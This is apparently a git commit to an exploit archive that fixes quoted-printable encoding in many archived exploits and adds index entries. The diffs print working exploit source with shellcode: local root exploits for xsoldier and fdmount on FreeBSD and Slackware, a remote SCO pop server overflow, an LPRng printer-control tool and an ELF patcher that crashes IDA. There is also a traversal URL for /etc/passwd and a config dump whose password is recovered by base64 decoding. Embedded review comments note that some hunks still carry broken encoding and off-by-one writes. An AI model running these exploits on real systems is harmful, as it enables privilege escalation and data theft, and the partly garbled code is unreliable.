DB: 2016-04-09

3 new exploits

WordPress Freshmail - Unauthenticated SQL Injection
WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection
Express Zip <= 2.40 - Path Traversal
Apple Intel HD 3000 Graphics driver 10.0.0 - Local Privilege Escalation
op5 7.1.9 - Remote Command Execution
Offensive Security 2016-04-09 05:02:52 +00:00
parent dd626b05db
commit 1f79ff2236
47 changed files with 1473 additions and 667 deletions


@ -33336,7 +33336,7 @@ id,file,description,date,author,platform,type,port
36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow Vulnerability",2012-03-08,"Julien Ahrens",windows,local,0
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
36930,platforms/multiple/webapps/36930.txt,"WordPress Freshmail - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
@ -35895,3 +35895,6 @@ id,file,description,date,author,platform,type,port
39671,platforms/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0
39672,platforms/hardware/webapps/39672.txt,"PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities",2016-04-07,Orwelllabs,hardware,webapps,443
39673,platforms/linux/local/39673.py,"Mess Emulator 0.154-3.1 - Local Buffer Overflow",2016-04-07,"Juan Sacco",linux,local,0
39674,platforms/windows/local/39674.py,"Express Zip <= 2.40 - Path Traversal",2016-04-08,R-73eN,windows,local,0
39675,platforms/osx/local/39675.c,"Apple Intel HD 3000 Graphics driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",osx,local,0
39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443



@ -4,4 +4,4 @@ My Postcards is a commercial available eletronic postcard system. It is availabl
The magiccard.cgi script does not properly handle some types of input. As a result, it may be possible for a remote user to specify the location of a specific file on the system hosting the My Postcards software. Upon specifying the location of a file that is readable by the web server process, the user could disclose the contents of the specified file.
http://www.example.com/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd
http://www.example.com/cgi-bin/magiccard.cgi?pa=preview&next=custom&page=../../../../../../../../../../etc/passwd


@ -4,7 +4,7 @@ There is a buffer overflow vulnerability known to be present in the version of g
/*
* gdc exploit for Freebsd-3.3 yields euid=3D0(root)
* gdc exploit for Freebsd-3.3 yields euid=0(root)
* by default, only group wheel (or whatever your trusted gated group is)=
* and root can run gdc
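Review bot: The quoted-printable repair is incomplete in this hunk — the context line `* by default, only group wheel (or whatever your trusted gated group is)=` still ends with a soft line-break `=`, which should be dropped and the line rejoined with `* and root can run gdc`. The same leftover encoding survives on the new side in several other sections of this commit: the lpcontrol.c hunk (`=09` and the `\n",=20` continuation before the snprintf arguments), the cable-modem advisory (`=E2=80=9C`, `=20` and the `=`-continued `CRCVALUE`/`User Password` block), the fdmount exploit (`(char =` / `*)malloc(`), the SCO pop exploit (`printf("CONNECTION CLOSED...\n"); =`), the IDA ELF patcher (`PRO=` / `T_WRITE`) and the Freshmail advisory (`simil=` / `ar`, `sa=` / `me`). Where the break falls inside C source — fdmount's malloc cast and the mmap flags in the ELF patcher — the file no longer compiles as archived, so those are worth fixing in the same decoding pass rather than leaving for later.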


@ -6,71 +6,65 @@ The binary itself is subject to a buffer overflow attack (which may be launched
The user does not have to have a valid $DISPLAY to exploit this.
/* =
* xsoldier exploit for Freebsd-3.3-RELEASE
* Drops a suid root shell in /bin/sh
* Brock Tellier btellier@usa.net
*/
/*
* xsoldier exploit for Freebsd-3.3-RELEASE
* Drops a suid root shell in /bin/sh
* Brock Tellier btellier@usa.net
*/
#include <stdio.h>
char shell[]=3D /* mudge@l0pht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
char shell[]= /* mudge@l0pht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
#define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"
void buildui() {
FILE *fp;
char cc[100];
fp =3D fopen("/tmp/ui.c", "w");
fprintf(fp, CODE);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
system(cc);
char cc[100];
fp = fopen("/tmp/ui.c", "w");
fprintf(fp, CODE);
fclose(fp);
snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
system(cc);
}
main (int argc, char *argv[] ) {
int x =3D 0;
int y =3D 0;
int offset =3D 0;
int bsize =3D 4400;
char buf[bsize];
int eip =3D 0xbfbfdb65; /* works for me */
buildui();
int x = 0;
int y = 0;
int offset = 0;
int bsize = 4400;
char buf[bsize];
int eip = 0xbfbfdb65; /* works for me */
buildui();
if (argv[1]) { =
offset =3D atoi(argv[1]);
eip =3D eip + offset;
}
fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE
if (argv[1]) {
offset = atoi(argv[1]);
eip = eip + offset;
}
fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE
<btellier@usa.net>\n");
fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
fprintf(stderr, "eip=3D0x%x offset=3D%d buflen=3D%d\n", eip, offset, bsi=
ze);
=
fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
for ( x =3D 0; x < 4325; x++) buf[x] =3D 0x90;
fprintf(stderr, "NOPs to %d\n", x);
=
for ( x = 0; x < 4325; x++) buf[x] = 0x90;
fprintf(stderr, "NOPs to %d\n", x);
for ( y =3D 0; y < 67 ; x++, y++) buf[x] =3D shell[y];
fprintf(stderr, "Shellcode to %d\n",x);
=
for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
fprintf(stderr, "Shellcode to %d\n",x);
buf[x++] = eip & 0x000000ff;
buf[x++] = (eip & 0x0000ff00) >> 8;
buf[x++] = (eip & 0x00ff0000) >> 16;
buf[x++] = (eip & 0xff000000) >> 24;
fprintf(stderr, "eip to %d\n",x);
buf[x++] =3D eip & 0x000000ff;
buf[x++] =3D (eip & 0x0000ff00) >> 8;
buf[x++] =3D (eip & 0x00ff0000) >> 16;
buf[x++] =3D (eip & 0xff000000) >> 24;
fprintf(stderr, "eip to %d\n",x);
buf[bsize]=3D'\0';
buf[bsize]='\0';
execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);
}
}
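Review bot: The string literal in `fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE` is split across two lines, with `<btellier@usa.net>\n");` on the next one, so the new side still does not compile; this looks like another lost soft line-break and should be rejoined as `fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE <btellier@usa.net>\n");` (the exact spacing at the join cannot be recovered from the diff). Separately, `buf[bsize]='\0';` writes one element past the end of `char buf[bsize]` — `bsize - 1` is the last valid index — which is undefined behavior regardless of target, and the same one-past-the-end write appears as `buf[BUFLEN]='\n';` in the SCO pop server section. The `fopen("/tmp/ui.c", "w")` result in `buildui` is also used without a NULL check before `fprintf`/`fclose`.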


@ -1,4 +1,103 @@
#!/usr/bin/python
###############################################################################
#
#Title : Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability
#Author : Veerendra G.G from SecPod Technologies (www.secpod.com)
#Vendor : http://www.avaya.com/usa/product/ip-office
#Advisory : http://www.avaya.com/usa/product/ip-office
# http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
# http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
# http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
#Version : Avaya IP Office Manager TFTP Server Version 8.1
#Date : 08/07/2011
#
################################################################################
#
#SecPod ID: 1017 25/05/2011 Issue Discovered
# 31/05/2011 Vendor Notified
# No Response from the Vendor
# 08/07/2011 Advisory Released
#
#
#Class: Information Disclosure Severity: Medium
#
#
#Overview:
#---------
#Avaya IP Office Manager TFTP Server Version 8.1 is prone to a Directory
#Traversal vulnerability.
#
#
#Technical Description:
#----------------------
#The vulnerability is caused due to improper validation to Read Request
#Parameter containing '../' sequences, which allows attackers to read
#arbitrary files via directory traversal attacks.
#
#
#Impact:
#--------
#Successful exploitation could allow an attacker to to obtain sensitive
#information, which can lead to launching further attacks.
#
#
#Affected Software:
#------------------
#Avaya IP Office Manager TFTP Server Version 8.1
#
#
#Tested on:
#-----------
#Avaya IP Office Manager TFTP Server Version 8.1 on Windows XP SP3.
#
#
#References:
#-----------
#http://secpod.org/blog/?p=225
#http://www.avaya.com/usa/product/ip-office
#http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
#http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
#http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt
#
#
#Proof of Concept:
#----------------
#http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py
#http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap
#
#
#Solution:
#----------
#Not available
#
#
#Risk Factor:
#-------------
# CVSS Score Report:
# ACCESS_VECTOR = NETWORK
# ACCESS_COMPLEXITY = LOW
# AUTHENTICATION = NOT_REQUIRED
# CONFIDENTIALITY_IMPACT = PARTIAL
# INTEGRITY_IMPACT = NONE
# AVAILABILITY_IMPACT = NONE
# EXPLOITABILITY = PROOF_OF_CONCEPT
# REMEDIATION_LEVEL = UNAVAILABLE
# REPORT_CONFIDENCE = CONFIRMED
# CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N)
# CVSS Temporal Score = 4.5
# Risk factor = Medium
#
#
#Credits:
#--------
#Veerendra G.G of SecPod Technologies has been credited with the discovery of
#this vulnerability.
#
#
#SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py:
#
##############################################################################
# Exploit : http://secpod.com/blog/?p=225
# http://secpod.org/Exploit-Avaya-IP-Manager-Dir-Trav.py


@ -35,27 +35,27 @@ Length: unspecified [application/octet-stream Content-transfer-encoding: bi=
nary]
Saving to: =E2=80=9Cfilename.gwc=E2=80=9D
[ <=3D> ] 15,=
[ <=> ] 15,=
927 50.9K/s in 0.3s =20
2012-12-08 21:24:43 (50.9 KB/s) - =E2=80=9Cfilename.gwc=E2=80=9D saved [159=
27]
$ head -n 10 filename.gwc=20
CRCVALUE=3D4144540802;
CRCVALUE=4144540802;
#<<Begin of Configuration File>>
Version=3D1.1;
Created Date=3D2012/12/8;
Created Time=3D21:24:43;
Model Number=3DDPC2420;
Serial Number=3D234905123;
User Password=3Dky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw=
Version=1.1;
Created Date=2012/12/8;
Created Time=21:24:43;
Model Number=DPC2420;
Serial Number=234905123;
User Password=ky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw=
l0jX2glgaQuXx27Eo3FgAz5E1N7bk9yR
7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4t4D7TJzy2oV43flEwmdIPkyJC74zTOYZhb24UL=
Jz3HV6ci5wn3gMPi0rSTkUc3pzHdiK
WMMAsuMrYBi5MU9yqZ1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6iisAQZRQcF/kiym5V=
ewYRBbnRNKjMXC0fw+M9y4V7Y8S4B6
3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg=3D=3D;
3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg==;
[---OUTPUT OMITTED FOR SPACE REASONS---]
[0x02]> - Persistent XSS
@ -94,12 +94,12 @@ lain text easily.=20
0x00b0: 300d 0a41 6363 6570 743a 2074 6578 742f 0..Accept:.text/
0x00c0: 6874 6d6c 2c61 7070 6c69 6361 7469 6f6e html,application
0x00d0: 2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69 /xhtml+xml,appli
0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 cation/xml;q=3D0.=
0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 cation/xml;q=0.=
9
0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=3D0.8..Acc=
0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=0.8..Acc=
e
0x0100: 7074 2d4c 616e 6775 6167 653a 2065 6e2d pt-Language:.en-
0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=3D0.5..Ac=
0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=0.5..Ac=
c
0x0120: 6570 742d 456e 636f 6469 6e67 3a20 677a ept-Encoding:.gz
0x0130: 6970 2c20 6465 666c 6174 650d 0a43 6f6e ip,.deflate..Con
@ -109,13 +109,13 @@ c
0x0170: 2f77 6562 7374 6172 2e68 746d 6c0d 0a41 /webstar.html..A
0x0180: 7574 686f 7269 7a61 7469 6f6e 3a20 4261 uthorization:.Ba
0x0190: 7369 6320 4f6b 4d30 626d fa38 3443 a9c0 sic.aWFtYXBhc3N3
0x01a0: 1b4e 1134 640a 054b ZAo=3D=3D....
0x01a0: 1b4e 1134 640a 054b ZAo==....
- From 0x0180 offset to the end of the packet payload the attacker could ge=
t the password=20
encoded with Base64 and simply convert it to plain text:
$ echo aWFtYXBhc3N3ZAo=3D=3D | base64 -d
$ echo aWFtYXBhc3N3ZAo== | base64 -d
iamapassword
- ---
@ -136,5 +136,5 @@ zf321LYlndkJuziYkjTjnJHtroaNh9I0jJMZhVFLJSTuAXmCp0OutPveWEvEX/h9
s6/7Iyi952A3YkqCEsy4q8JUaoxGLMvXeUZM71zVvwEeF8M/2BPziU/JleHMdXWq
X2XH8V94KuiILuFSeS+rtT5ILJDHyWL9uVc1wIWvl33jnhPqSCgPlWvwLuWHBf+G
E7C4vqJfmBNShPTbtb67
=3DEzto
=Ezto
-----END PGP SIGNATURE-----


@ -8,14 +8,14 @@ From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y"
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300
--=3D-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=3Dname
Content-Type: application/octet-stream; name=3Dname
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit
begin 600 phase2
@ -27,4 +27,4 @@ M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@
end
--=3D-mTDu5zdJIsixETTwCF5Y--
--=-mTDu5zdJIsixETTwCF5Y--


@ -30,89 +30,89 @@ The LPRng software is an enhanced, extended, and portable version of the Berkele
int main(int argc, char **argv)
{
int sock;
struct sockaddr_in dest_sin;
struct sockaddr_in src_sin;
struct hostent *hp;
unsigned long ipnum;
char line[256];
int mode =3D 0;
int sock;
struct sockaddr_in dest_sin;
struct sockaddr_in src_sin;
struct hostent *hp;
unsigned long ipnum;
char line[256];
int mode = 0;
if (argc < 2)
{
fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]);
exit(EXIT_FAILURE);
}
if (argc < 2)
{
fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]);
exit(EXIT_FAILURE);
}
if (argc >=3D 3)
{
if (!strcmp(argv[2], "start"))
mode =3D 1;
else if (strcmp(argv[2], "stop"))
{
fprintf(stderr, "Invalid mode. Use stop or start.\n");
fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]);
exit(EXIT_FAILURE);
}
}
=09
snprintf(line, sizeof(line), "%c%s root %s %s\n",=20
6, argv[1], (mode)? "start":"stop", argv[1]);
if (argc >= 3)
{
if (!strcmp(argv[2], "start"))
mode = 1;
else if (strcmp(argv[2], "stop"))
{
fprintf(stderr, "Invalid mode. Use stop or start.\n");
fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]);
exit(EXIT_FAILURE);
}
}
=09
snprintf(line, sizeof(line), "%c%s root %s %s\n",=20
6, argv[1], (mode)? "start":"stop", argv[1]);
memset(&dest_sin, 0, sizeof(struct sockaddr_in));
dest_sin.sin_port =3D htons((short) DST_PORT);
memset(&dest_sin, 0, sizeof(struct sockaddr_in));
dest_sin.sin_port = htons((short) DST_PORT);
ipnum =3D (unsigned long) inet_addr(HOST);
if (ipnum !=3D ((unsigned long) INADDR_NONE))
{
dest_sin.sin_family =3D AF_INET;
dest_sin.sin_addr.s_addr =3D ipnum;
}
else
{
if ((hp =3D gethostbyname(HOST)) =3D=3D NULL)
{
fprintf(stderr, "Host lookup failed.\n");
exit(EXIT_FAILURE);
}
ipnum = (unsigned long) inet_addr(HOST);
if (ipnum != ((unsigned long) INADDR_NONE))
{
dest_sin.sin_family = AF_INET;
dest_sin.sin_addr.s_addr = ipnum;
}
else
{
if ((hp = gethostbyname(HOST)) == NULL)
{
fprintf(stderr, "Host lookup failed.\n");
exit(EXIT_FAILURE);
}
dest_sin.sin_family =3D hp->h_addrtype;
memcpy(&dest_sin.sin_addr.s_addr,hp->h_addr_list[0],
(size_t)hp->h_length);
}
dest_sin.sin_family = hp->h_addrtype;
memcpy(&dest_sin.sin_addr.s_addr,hp->h_addr_list[0],
(size_t)hp->h_length);
}
if ((sock =3D socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("Socket call failed");
exit(EXIT_FAILURE);
}
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("Socket call failed");
exit(EXIT_FAILURE);
}
src_sin.sin_family =3D AF_INET;
src_sin.sin_addr.s_addr =3D INADDR_ANY;
src_sin.sin_port =3D htons((u_short) SRC_PORT);
src_sin.sin_family = AF_INET;
src_sin.sin_addr.s_addr = INADDR_ANY;
src_sin.sin_port = htons((u_short) SRC_PORT);
if ((bind(sock, (struct sockaddr *)&src_sin, sizeof(src_sin))) < 0)
{
perror("Bind failed");
exit(EXIT_FAILURE);
}
if ((bind(sock, (struct sockaddr *)&src_sin, sizeof(src_sin))) < 0)
{
perror("Bind failed");
exit(EXIT_FAILURE);
}
if (connect(sock, (struct sockaddr *)&dest_sin, sizeof(dest_sin)) < 0)
{
close(sock);
perror("Connect failed");
exit(EXIT_FAILURE);
}
if (connect(sock, (struct sockaddr *)&dest_sin, sizeof(dest_sin)) < 0)
{
close(sock);
perror("Connect failed");
exit(EXIT_FAILURE);
}
if (write(sock, line, strlen(line)) <=3D 0)
{
perror("Write failed");
exit(EXIT_FAILURE);
}
if (write(sock, line, strlen(line)) <= 0)
{
perror("Write failed");
exit(EXIT_FAILURE);
}
close(sock);
close(sock);
return EXIT_SUCCESS;
return EXIT_SUCCESS;
}
---- stop lpcontrol.c -----------------------------------------------


@ -51,7 +51,7 @@ box,
// Gee, Aleph1 his shellcode is back once more
char shellcode[] =3D
char shellcode[] =
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
@ -63,16 +63,16 @@ unsigned long get_sp(void) {
main(int argc, char **argv)
{
int buf_size =3D 71;
int offset=3D0, i;
int buf_size = 71;
int offset=0, i;
char *overflow;
char *ovoff;
long addr, ptr=3D0x0804c7d0;
long addr, ptr=0x0804c7d0;
if(argc>1) offset =3D atoi(argv[1]);
if(argc>2) buf_size =3D atoi(argv[2]);
if(argc>3) ptr =3D strtol(argv[3], (char **) NULL, 16);
if(argc>1) offset = atoi(argv[1]);
if(argc>2) buf_size = atoi(argv[2]);
if(argc>3) ptr = strtol(argv[3], (char **) NULL, 16);
printf("##############################################\n");
printf("# fdmount Slack 4/7 exploit - by Scrippie #\n");
@ -82,19 +82,19 @@ main(int argc, char **argv)
printf("Using 0x%x for \"void errmsg(char *text,...)\" char *text\n", =
ptr);
if(!(overflow =3D (char =
if(!(overflow = (char =
*)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) {
fprintf(stderr, "Outta memory - barging out\n");
exit(-1);
}
overflow[0] =3D '/';
overflow[0] = '/';
for(i=3D1;i<buf_size;i++) {
overflow[i] =3D 0x90;
for(i=1;i<buf_size;i++) {
overflow[i] = 0x90;
}
addr =3D get_sp() - offset;
addr = get_sp() - offset;
printf("Resulting address: 0x%x\n", addr);
@ -103,10 +103,10 @@ ptr);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
ovoff =3D overflow + strlen(overflow);
ovoff = overflow + strlen(overflow);
for(i=3D0;i<NUM_NOPS;i++) {
*ovoff =3D 0x90;
for(i=0;i<NUM_NOPS;i++) {
*ovoff = 0x90;
*ovoff++;
}


@ -19,7 +19,7 @@ A buffer overflow exists in the pop server shipped with Santa Cruz Operation, In
#include <netdb.h>
#include <sys/errno.h>
char *shell=3D
char *shell=
"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
"\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7e"
"\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
@ -32,7 +32,7 @@ char *shell=3D
#define BUFLEN 1200
char buf[BUFLEN];
int offset=3DOFFSET;
int offset=OFFSET;
int nbytes;
int sock;
struct sockaddr_in sa;
@ -47,24 +47,24 @@ v2.1.4-R3\n");
exit(0);
}
if(argc>2)
offset=3Datoi(argv[2]);
offset=atoi(argv[2]);
memset(buf,0x90,BUFLEN);
memcpy(buf+800,shell,strlen(shell));
for(i=3D901;i<BUFLEN-4;i+=3D4)
*(int *)&buf[i]=3DADDR+offset;
buf[BUFLEN]=3D'\n';
if((hp=3D(struct hostent *)gethostbyname(argv[1]))=3D=3DNULL) {
for(i=901;i<BUFLEN-4;i+=4)
*(int *)&buf[i]=ADDR+offset;
buf[BUFLEN]='\n';
if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("gethostbyname()");
exit(0);
}
if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("socket()");
exit(0);
}
sa.sin_family=3DAF_INET;
sa.sin_port=3Dhtons(110);
sa.sin_family=AF_INET;
sa.sin_port=htons(110);
memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=3D0) {
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
perror("connect()");
exit(0);
}
@ -77,17 +77,17 @@ fflush(stdout);
FD_SET(0,&input);
FD_SET(sock,&input);
if((select(sock+1,&input,NULL,NULL,NULL))<0) {
if(errno=3D=3DEINTR) continue;
if(errno==EINTR) continue;
printf("CONNECTION CLOSED...\n"); =
fflush(stdout);
exit(1);
}
if(FD_ISSET(sock,&input)) {
nbytes=3Dread(sock,buf,BUFLEN);
for(i=3D0;i<nbytes;i++) {
*(char *)&a=3Dbuf[i];
if ((a!=3D10)&&((a >126) || (a<32)) ){
buf[i]=3D' ';
nbytes=read(sock,buf,BUFLEN);
for(i=0;i<nbytes;i++) {
*(char *)&a=buf[i];
if ((a!=10)&&((a >126) || (a<32)) ){
buf[i]=' ';
}
}
write(1,buf,nbytes);


@ -34,8 +34,8 @@ nitr0us@burial:~$ gdb -q idaq
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to Thread 0xb6860760 (LWP 3638)]
0xb55f7694 in default_notification_handler (reader=3D@0xbfbffae0,
notif=3Dreader_t::err_shstrndx) at reader.cpp:33
0xb55f7694 in default_notification_handler (reader=@0xbfbffae0,
notif=reader_t::err_shstrndx) at reader.cpp:33
33 reader.cpp: No such file or directory.
in reader.cpp
Current language: auto; currently c++
@ -75,7 +75,7 @@ verify if e_shstrndx > e_shnum before referencing it.
#define ELFCLASS32 1 /* 32-bit objects */
#define ELFDATA2LSB 1 /* 2's complement, little endian */
const char e_magic[4] =3D { 0x7f, 'E', 'L', 'F' };
const char e_magic[4] = { 0x7f, 'E', 'L', 'F' };
typedef uint16_t Elf32_Half;
typedef uint32_t Elf32_Word;
@ -128,7 +128,7 @@ fprintf(stderr, "Usage: %s <elf_file_to_patch>\n", argv[0]);
exit(-1);
}
if((fd =3D open(argv[1], O_RDWR)) =3D=3D -1){
if((fd = open(argv[1], O_RDWR)) == -1){
perror("open");
exit(-1);
}
@ -139,8 +139,8 @@ exit(-1);
}
// Mapping to memory only the necessary bytes [sizeof(header)]
if((header =3D (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PRO=
T_WRITE, MAP_SHARED, fd, 0)) =3D=3D MAP_FAILED){
if((header = (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PRO=
T_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){
perror("mmap");
close(fd);
exit(-1);
@ -156,17 +156,17 @@ printf("[*] Patching \"%s\" with new random() values...\n\n", argv[1]);
srand(time(NULL)); // seed for rand()
new_shnum =3D (Elf32_Half) rand() % 0x1337;
new_shstrndx =3D (Elf32_Half) 0;
new_shnum = (Elf32_Half) rand() % 0x1337;
new_shstrndx = (Elf32_Half) 0;
while(new_shstrndx < new_shnum)
new_shstrndx =3D (Elf32_Half) rand() % 0xDEAD;
new_shstrndx = (Elf32_Half) rand() % 0xDEAD;
header->e_shnum =3D new_shnum;
header->e_shstrndx =3D new_shstrndx;
header->e_shnum = new_shnum;
header->e_shstrndx = new_shstrndx;
// Synchronize the ELF in file system with the previous memory mapped
if(msync(NULL, 0, MS_SYNC) =3D=3D -1){
if(msync(NULL, 0, MS_SYNC) == -1){
perror("msync");
close(fd);
exit(-1);
@ -189,25 +189,25 @@ int isELF(int fd)
{
Elf32_Ehdrheader;
if(read(fd, &header, sizeof(header)) =3D=3D -1){
if(read(fd, &header, sizeof(header)) == -1){
perror("isELF(): read");
return 0;
}
/* magic number verification */
if(memcmp(header.e_ident, e_magic, 4) !=3D 0){
if(memcmp(header.e_ident, e_magic, 4) != 0){
fprintf(stderr, "The argument given is not an ELF file !\n");
return 0;
}
/* 32-bit class verification */
if(header.e_ident[4] !=3D ELFCLASS32){
if(header.e_ident[4] != ELFCLASS32){
fprintf(stderr, "Only 32-bit ELF files supported !\n");
return 0;
}
/* little-endian verification */
if(header.e_ident[5] !=3D ELFDATA2LSB){
if(header.e_ident[5] != ELFDATA2LSB){
fprintf(stderr, "Only little-endian ELF files supported !\n");
return 0;
}
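Review bot: In the mmap hunk, `mmap(NULL, sizeof(header), PROT_READ | PRO=` / `T_WRITE, MAP_SHARED, fd, 0)` still carries the soft line-break inside `PROT_WRITE`, so the new side does not compile, and `sizeof(header)` measures the `Elf32_Ehdr *` pointer rather than the header it points to (`sizeof *header`); the later writes to `header->e_shnum` and `header->e_shstrndx` only land because the mapping is page-granular. `msync(NULL, 0, MS_SYNC)` names no mapped range, so it flushes nothing in particular; `msync(header, sizeof *header, MS_SYNC)` refers to the region that was actually mapped (with MAP_SHARED the modification reaches the file either way, so this is about the correctness of the call rather than the result). In the `isELF` hunk, `Elf32_Ehdrheader;` has lost the space between the type and the variable name, presumably another decoding artifact, and will not compile as written. The remainder of `main` lies outside the hunks shown.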


@ -22,7 +22,7 @@ paths via Spring Security configuration or other means.
Example:
A request to:
/app/api/rpc/users/get?offset=3DOFFSET
